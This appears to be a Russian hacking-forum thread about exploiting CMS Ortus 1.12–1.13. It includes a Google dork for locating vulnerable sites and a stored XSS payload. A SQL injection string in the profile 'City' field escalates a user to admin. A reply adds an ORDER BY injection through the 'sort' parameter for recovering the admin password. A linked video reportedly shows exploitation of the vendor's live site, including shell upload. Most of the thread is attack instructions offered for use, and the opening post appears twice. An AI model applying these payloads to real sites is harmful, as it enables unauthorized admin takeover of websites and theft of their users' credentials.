На днях занимался исследованием CMS Ortus. Нашёл серьёзную уязвимость, заодно подучил латынь. Теперь, знаю что Ortus по латыни означает "рассвет". Короче, век живи - век учись, как говорил Цицерон :)

Сайт вендора: http://ortus.nirn.ru

Уязвимые версии: 1.12, 1.13

Гуглится так: inurl:index.php?ortupg=

Уязвимость присутствует в формах добавления пользователя и редактирования профиля, в поле "City".

Рассмотрим по порядку:

1. Зарегистрируем нового пользователя
http://www.site.com/index.php?mod=users_add
Данные из POST-формы будут помещены в следующий SQL-запрос
INSERT INTO ortus_users SET id_user = NULL, name = 'pupkin', login = 'pupkin', psw = md5('12345'), `group` = 'user', `city` = 'Moscow', `info` = '', `email` = 'pupkin@zade.com', `reg_date` = NOW(), `activated` = 'no', `subscribe` = 'yes'
А поскольку параметр "City" не фильтруется, можно пробовать изменять запрос под свои нужды. Правда, максимум, что мне удалось выжать из данной формы - это активную XSS после вставки в поле "City"
<script>alert()</script>
что в принципе тоже достаточно нефигово, но идём дальше...

2. Аутентифицируемся на сайте
http://www.site.com/index.php?mod=auth

3. Редактируем профиль пользователя
http://www.site.com/index.php?mod=users_edit_pub
Обновление профиля пользователя производится запросом
UPDATE ortus_users SET `name` = 'pupkin', `info` = '', `city` = 'Moscow', `email` = 'pupkin@zade.com', `subscribe` = 'yes' WHERE id_user = 7
Мы можем видоизменить данный запрос вставив
MyCity', `group`='admin
в поле "City". То есть наш запрос стал выглядеть так
UPDATE ortus_users SET `name` = 'pupkin', `info` = '', `city` = 'MyCity', `group`='admin', `email` = 'pupkin@zade.com', `subscribe` = 'yes' WHERE id_user = 7
Пользователь pupkin был членом группы user, а стал членом группы admin. Убедиться в этом можно посмотрев список пользователей
http://www.site.com/index.php?mod=users_list_pub

4. Видео-урок

Видео-урок показывает практическую эксплуатацию данной уязвимости + не упомянутый выше вопрос заливки шелла. Демонстрация уязвимости производится на примере официального сайта CMS Ortus. Особо хочу отметить, что видео носит исключительно образовательный характер и никаких деструктивных действий на сайте не производилось. За косяки третьих лиц автор ответственности не несёт! Само видео льём отсюда:

http://depositfiles.com/files/h8sbwikey

Отлично, и понятно :)
+ однозначно !

сегодня тоже пришлось столкнуться с этой цмс, опубликованную otmorozok428 багу закрыли на сл же день:
28 ноября 2008
Взлом сайта CMS Ortus. SQL-инъекция.
Сегодня был взломан сайт CMS Ortus (и сама система тоже). SQL-инъекция.
Злоумышленник воспользовался опечаткой в коде модуля смены пользовательского профиля
28 ноября 2008
CMS Ortus 1.13.1 Исправлена уязвимость в модуле редактирования пользовательского профиля.
+ ни одна из переменных на сайте не пропускает спецсимволы, пришлось немного повозиться, но все же бага нашлась)
для переменной $sort в скрипте просмотра существующих пользователей не задается фиксированный набор значений
и обратившись к _ortus.nirn.ru/index.php?mod=users_list_pub&sort=lalala
появляется ключевая ошибка: Unknown column 'lalala' in 'order clause'
качаем двиг узнаем нужную нам колонку:
CREATE TABLE `users` (
`id_user` int(32) NOT NULL auto_increment,
`name` tinytext NOT NULL,
`login` tinytext,
`psw` tinytext,
...

сортируем список по найденной колонке _ortus.nirn.ru/index.php?mod=users_list_pub&sort=psw
и подбираем пароль админа как в обычной сортировочной sql inj. , т.е. методом создания новых пользователей ;)

↑ (https://antichat.live/posts/964582/)
На днях занимался исследованием
CMS Ortus
. Нашёл серьёзную уязвимость, заодно подучил латынь. Теперь, знаю что Ortus по латыни означает "рассвет". Короче, век живи - век учись, как говорил Цицерон
Сайт вендора: http://ortus.nirn.ru
Уязвимые версии: 1.12, 1.13
Гуглится так: inurl:index.php?ortupg=
Уязвимость присутствует в формах добавления пользователя и редактирования профиля, в поле
"City"
.
Рассмотрим по порядку:
1. Зарегистрируем нового пользователя

http://www.site.com/index.php?mod=users_add

Данные из POST-формы будут помещены в следующий SQL-запрос

INSERT INTO ortus_users SET id_user=NULL,name= 'pupkin',login='pupkin',psw=md5('12345'), `group` ='user', `city` ='Moscow', `info` ='', `ema il` ='pupkin@zade.com', `reg_date` =NOW(), `ac tivated` ='no', `subscribe` ='yes'

А поскольку параметр
"City"
не фильтруется, можно пробовать изменять запрос под свои нужды. Правда, максимум, что мне удалось выжать из данной формы - это активную XSS после вставки в поле
"City"

alert()

что в принципе тоже достаточно нефигово, но идём дальше...
2. Аутентифицируемся на сайте

http://www.site.com/index.php?mod=auth

3. Редактируем профиль пользователя

http://www.site.com/index.php?mod=users_edit_pub

Обновление профиля пользователя производится запросом

UPDATE ortus_users SET`name` ='pupkin', `info` ='', `city` ='Moscow', `email` ='pupkin@zade .com', `subscribe` ='yes'WHERE id_user=7

Мы можем видоизменить данный запрос вставив

MyCity', `group`='admin

в поле
"City"
. То есть наш запрос стал выглядеть так

UPDATE ortus_users SET`name` ='pupkin', `info` ='', `city` ='MyCity', `group`='admin', `ema il` ='pupkin@zade.com', `subscribe` ='yes'WHERE id_user=7

Пользователь
pupkin
был членом группы
user
, а стал членом группы
admin
. Убедиться в этом можно посмотрев список пользователей

http://www.site.com/index.php?mod=users_list_pub

4. Видео-урок
Видео-урок показывает практическую эксплуатацию данной уязвимости + не упомянутый выше вопрос заливки шелла. Демонстрация уязвимости производится на примере официального сайта
CMS Ortus
. Особо хочу отметить, что видео носит исключительно образовательный характер и никаких деструктивных действий на сайте не производилось. За косяки третьих лиц автор ответственности не несёт! Само видео льём отсюда:
http://depositfiles.com/files/h8sbwikey


Видео-урок перезалейте пожалуйста, ссылка битая, интересно посмотреть